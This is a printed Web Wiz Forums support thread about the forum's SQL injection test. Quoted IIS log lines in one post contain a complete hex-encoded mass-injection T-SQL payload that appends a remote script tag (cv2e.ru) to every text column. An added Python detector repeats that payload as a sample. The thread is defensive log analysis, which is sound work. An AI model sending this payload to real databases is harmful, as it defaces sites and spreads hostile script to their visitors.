
SqlInjectionTest

Printed From: Web Wiz Forums
Category: Web Wiz Web App Support Forums
Forum Name: Web Wiz Forums
Forum Description: Support forum for Web Wiz Forums application.
URL: https://forums.webwiz.net/forum_posts.asp?TID=26189
Printed Date: 03 April 2026 at 9:37am
Software Version: Web Wiz Forums 12.08 - https://www.webwizforums.com


Topic: SqlInjectionTest
Posted By: Nick-V
Subject: SqlInjectionTest
Date Posted: 30 August 2008 at 11:30am
I've just installed 9.51 with all logging enabled. I note the following:
 
2008-08-29 18:00:05 - 192.168.1.196 - Guest - ERROR - File: functions_common.asp - Error Details: err_SQLServer_SqlInjectionTest() -  -
 
  1. I really welcome additional security but would like to know what is happening here? A guest cannot post so cannot inject? What is this test telling me?
  2. Why are we seeing an internal IP address 192.168.xxx.xxx?



Replies:
Posted By: Nick-V
Date Posted: 30 August 2008 at 12:14pm
I am checking the forum log and the IIS log to try and determine exactly what is happening with some SQL injections and have provided info below that may be useful. My questions:
 
1) Does printer_friendly_posts.asp (and others) need to be protected...there was an attempt in the IIS log but nothing in the forum log?
 
2) Why do the two apparent attacks in the IIS log from 196.44.128.221 have an IP address in the forum log of 192.168.1.196?
 
4 x SQL forum log entries (printer_friendly_posts.asp is missing)
2008-08-29 17:57:07 - 192.168.1.196 - Guest - ERROR - File: functions_common.asp - Error Details: err_Server_SqlInjectionTest() -  -
2008-08-29 18:00:05 - 192.168.1.196 - Guest - ERROR - File: functions_common.asp - Error Details: err_SQLServer_SqlInjectionTest() -  -
2008-08-29 19:06:51 - 189.20.218.142 - Guest - ERROR - File: functions_common.asp - Error Details: err_SQLServer_SqlInjectionTest() -  -
2008-08-29 23:06:27 - 200.96.213.185 - Guest - ERROR - File: functions_common.asp - Error Details: err_SQLServer_SqlInjectionTest() -  -
5 x IIS log entries
2008-08-29 16:57:08 W3SVC741317 BPMFS01 xxx.xxx.xxx.xxx GET /forum/forum_posts.asp TID=7409;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(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%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 196.44.128.221 HTTP/1.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - - http://www.xxx.com - www.xxx.com 200 0 0 890 1628 359
 
2008-08-29 17:00:05 W3SVC741317 BPMFS01 xxx.xxx.xxx.xxx GET /forum/forum_posts.asp TID=7409;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E637632652E72752F7363726970742E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 196.44.128.221 HTTP/1.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - - http://www.xxx.com/ - www.xxx.com 200 0 0 890 1628 359
 
2008-08-29 17:57:30 W3SVC741317 BPMFS01 xxx.xxx.xxx.xxx GET /forum/printer_friendly_posts.asp TID=8163;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(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%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 67.233.178.228 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - - http://www.xxx.com/ - www.xxx.com 302 0 0 799 1456 234
 
2008-08-29 18:06:52 W3SVC741317 BPMFS01 xxx.xxx.xxx.xxx GET /forum/forum_posts.asp TID=7409;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(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%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 189.20.218.142 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - - http://www.xxx.com/ - www.xxx.com 200 0 0 890 1445 578
 
2008-08-29 22:06:26 W3SVC741317 BPMFS01 xxx.xxx.xxx.xxx GET /forum/forum_posts.asp TID=7409;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(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


Posted By: WebWiz-Bruce
Date Posted: 31 August 2008 at 8:36am
The SQL Injection test has been put in place mainly to reduce the impact of the current SQL Injection Virus, which is very common at present.

Web Wiz Forums is already protected against SQL Injection. Any input used within an SQL Query is screened and any SQL removed. However, attacks by these viruses do NOT cause security issues in Web Wiz Forums thanks to the screening, but the page will still load as normal, using up bandwidth and server resources.

This test is run right at the beginning and just returns an error message, thus reducing your bandwidth consumption and server load when these viruses attack.

On some busy forums I have seen as many as 40 attempts per second by these viruses attempting to inject malicious SQL into the forum, so having this extra precaution is useful for these forums to reduce the amount of resources consumed unnecessarily by these virus attacks.

The IIS log file entries that you have included at the end of your post are from computers infected with an SQL Injection virus that attempted to inject malicious SQL into your forum.

To determine which pages are best protected and in what way, I have studied the log files of a number of large forums that come under regular attack from these viruses. The printer_friendly_posts.asp page does have this extra protection, so make sure you have updated it to the latest release.

IP addresses may be different in IIS log files to Web Wiz Forums, as IIS stores the IP of proxy servers, which can mean the IP is not always correct. Web Wiz Forums, being written in ASP, has to rely on the IP address contained in the HTTP header, which may be altered to give an incorrect IP address.


-------------
Web Wiz Forums Hosting - https://www.webwiz.net/web-wiz-forums/forum-hosting.htm
ASP.NET Web Hosting - https://www.webwiz.net/web-hosting/windows-web-hosting.htm
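The IIS entries quoted earlier in this thread all carry the same carrier form used by the mass-injection worms of that period: a T-SQL batch hidden as a hex literal, CAST back to VARCHAR and handed to EXEC. The Python below is an added example, not Web Wiz Forums code, that scans W3C-format IIS log lines for that carrier, decodes the hex literal and reports what it contained. It assumes the default W3C field order (the post shows no #Fields header), takes the one complete IIS line from the second post above as its real sample, and adds one constructed benign request using a documentation IP address.

```python
"""Detect and decode the hex-wrapped T-SQL injection seen in IIS W3C log lines.

Added example, not Web Wiz Forums code. Assumed field order (no #Fields header is
shown in the post): date time s-sitename s-computername s-ip cs-method
cs-uri-stem cs-uri-query s-port cs-username c-ip ... (remaining fields unused).
"""
import re
from urllib.parse import unquote

# The carrier: DECLARE @S VARCHAR(n);SET @S=CAST(0x... AS VARCHAR(n));EXEC(@S)
# Applied to the URL-decoded query string. Group 1 is the variable name,
# group 2 the hex literal that hides the real batch.
INJECTION_RE = re.compile(
    r"DECLARE\s+@(\w+)\s+N?VARCHAR\(\d+\)\s*;\s*"
    r"SET\s+@\1\s*=\s*CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR\(\d+\)\s*\)\s*;\s*"
    r"EXEC\(\s*@\1\s*\)",
    re.IGNORECASE,
)

# Sample input. The first line is constructed (203.0.113.10 is a documentation
# address); the second is the complete 17:00:05 entry quoted in the post.
SAMPLE_LOG = [
    "2008-08-29 16:50:00 W3SVC741317 BPMFS01 xxx.xxx.xxx.xxx GET /forum/forum_posts.asp "
    "TID=7409 80 - 203.0.113.10 HTTP/1.1 Mozilla/4.0+(compatible) - - - - www.xxx.com 200 0 0 890 1628 12",
    "2008-08-29 17:00:05 W3SVC741317 BPMFS01 xxx.xxx.xxx.xxx GET /forum/forum_posts.asp "
    "TID=7409;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST("
    "0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E637632652E72752F7363726970742E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220"
    "%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 196.44.128.221 HTTP/1.0 "
    "Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - - "
    "http://www.xxx.com/ - www.xxx.com 200 0 0 890 1628 359",
]


def parse_iis_line(line):
    """Split a W3C extended log line into the fields this check needs.

    IIS replaces spaces inside field values with '+', so a plain whitespace
    split is safe. Returns None for comment lines or short lines.
    """
    f = line.split()
    if not f or f[0].startswith("#") or len(f) < 11:
        return None
    return {
        "timestamp": f"{f[0]} {f[1]}",
        "method": f[5],
        "stem": f[6],
        "query": unquote(f[7]),   # %20 -> space, so the regex sees real T-SQL
        "client_ip": f[10],
    }


def decode_hex_payload(hexstr):
    """Recover the T-SQL hidden in the 0x... literal.

    CAST(0x.. AS VARCHAR) makes SQL Server read the bytes as single-byte
    characters, so latin-1 is the faithful decoding (no byte can fail).
    """
    return bytes.fromhex(hexstr).decode("latin-1")


def inspect(line):
    """Parse one line and attach the decoded injection, or None if clean."""
    rec = parse_iis_line(line)
    if rec is None:
        return None
    m = INJECTION_RE.search(rec["query"])
    rec["injection"] = decode_hex_payload(m.group(2)) if m else None
    return rec


def injected_script(payload):
    """Return the <script ...> tag this worm family appends to text columns,
    or None if the decoded batch does not contain one."""
    m = re.search(r"<script[^>]*>", payload, re.IGNORECASE)
    return m.group(0) if m else None


def scan(lines):
    """One record per request that carried the injection."""
    return [r for r in map(inspect, lines) if r and r["injection"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["timestamp"], hit["client_ip"], hit["method"], hit["stem"])
        print("  payload:", hit["injection"][:120], "...")
        print("  appends:", injected_script(hit["injection"]))
```

Decoding the literal from the quoted entry shows a batch that opens a cursor over sysobjects and syscolumns, then for every text column of every user table runs an UPDATE that appends a script tag to the existing value. That is why screening SQL out of input leaves the forum unaffected: the batch only does anything if the whole string reaches EXEC intact. The same regular expression run against the raw query string before any database work is the shape of the early test Bruce describes: match, return the error page, spend nothing further on the request. When correlating the two logs, note that the forum log timestamps in the post are one hour ahead of the IIS timestamps for the same requests.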


Posted By: Nick-V
Date Posted: 31 August 2008 at 11:16am
Thanks for all the useful explanations about this new feature...
 
I replaced ALL files when I set up this version but I'll check the version of printer_friendly_posts.asp again - more likely the error predates the upgrade!
 
EDIT: I definitely have the correct version installed and the log timestamps show that everything was in place...I will monitor this.


